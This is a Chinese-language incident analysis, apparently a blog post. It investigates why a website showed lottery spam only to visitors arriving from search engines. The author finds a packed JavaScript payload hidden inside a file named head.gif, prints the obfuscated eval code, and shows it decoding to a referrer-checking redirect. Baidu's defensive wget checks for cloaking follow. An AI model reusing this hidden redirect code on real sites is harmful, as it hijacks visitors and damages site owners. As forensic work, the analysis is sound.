案例:XX主页从搜索引擎打开会变为六合彩,直接输入网址一切正常,什么原理呢
分析原因:1.机房arp攻击2,。被插入恶意代码
检测步骤:
1.查找安全软件日志,定位作乱的mac地址,查阅ip/mac表,检查对应主机(发现是一台曾经被黑的主机时间大概2011年1到2月份)
2.查找恶意代码,使用dreamever的查找功能,全站检索关键词无果,怀疑js或者css引用,再次查看无果。
3.最笨的方法开始,用文本编辑器Editplus挨个点击图片jpg、gif,swf等文件,查到一个恶意图片文件。
============================恶意文件head.gif================================================
============================================================================================
看到eval(function(p,a,c,k,e,d)
推测javascript语句,使用google,而不是百度,很纠结(百度里谷歌一下)
找到一种解决加密的方式
新建一个html文档
==================================================
eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}ttt.value=p;}('l="";k d=9.m;n((d.2("%1%p%o%1%j%g%1%c%f")>0)||(d.2("8=%7%6%a%3%4%5")>0)||(d.2("8=%3%q%r%A%7%6%a%3%4%5")>0)){9.s("<\\/b>")}B{i.C.h="e.E"}',41,41,'|E5|indexOf|CF|B2|CA|F9|C1|wd|document|BA|script|BD||index|A9|88|href|window|90|var|GIF89a|referrer|if|AD|85|E3|B8|writeln|pic|src|http|89614|www|com|bby|DB|else|location|gif|aspx'.split('|'),0,{}))
======================================================================================
红色代码部分return p修改为xxx.value=p ,xxx这里随便输入一个ttt,和标题对应
浏览器打开
============================================================================================
GIF89a="";var d=document.referrer;if((d.indexOf("%E5%85%AD%E5%90%88%E5%BD%A9")>0)||(d.indexOf("wd=%C1%F9%BA%CF%B2%CA")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA")>0)){document.writeln("
===============================
百度给出的解释
我的网站被标记风险标志,但标题和描述都与我网站无关,是不是百度弄错了?
此类被黑是针对网站UA(user-agent)进行的,在此为您提供两条检查的方法以供参考:
1)linux 下可使用wget命令:
wget http://xxxxxx/xx -UBaiduspider -O baiduUA.html
wget http://xxxxxx/xx -O nullUA.html
打开文件baiduUA.html,nullUA.html,对比内容是否一致,若不一致证明服务器对不同UA返回不同结果。如果您没有设置服务器,那么您的网站就是被黑了。
2)使用firefox 插件 user agent switcher,设置不同的user agent,然后用firefox打开您的首页,如果页面不一致且您并没有设置服务器,那么您的网站就是被黑了。
请您务必及时检查并修复您的网站,或寻求技术人员的帮助,以减小由此带来的损失。
具体来讲,黑客通过侵入您的网站,添加针对来自百度搜索用户才会展现的页面,这样一来用户再通过百度搜索进入您的网站时展现的便是黑客制造的页面,而直接访问和通过其他搜索引擎的访问时,这些被黑页面是不会展现出来的。这对您的网站和网站用户的伤害极大,请您及时对网站进行检查并修复。
对于此类针对网站referer功能的黑客行为,我们提供两条具体检查方法以供您或者网站技术人员参考:
1)linux 下可使用wget命令:
wget http://xxxxxx/xx --referer=http://www.baidu.com/s?wd=abc -O baiduREF.html
wget http://xxxxxx/xx -O nullREF.html
打开文件baiduREF.html,nullREF.html,对比内容是否一致,若不一致证明服务器对不同referer返回不同结果。如果您没有设置服务器,那么您的网站就是被黑了。
2)使用firefox 插件 RefControl,设置不同的referer,然后用firefox打开您的首页,如果不同referer打开的页面不一致且您并没有设置服务器,那么您的网站就是被黑了。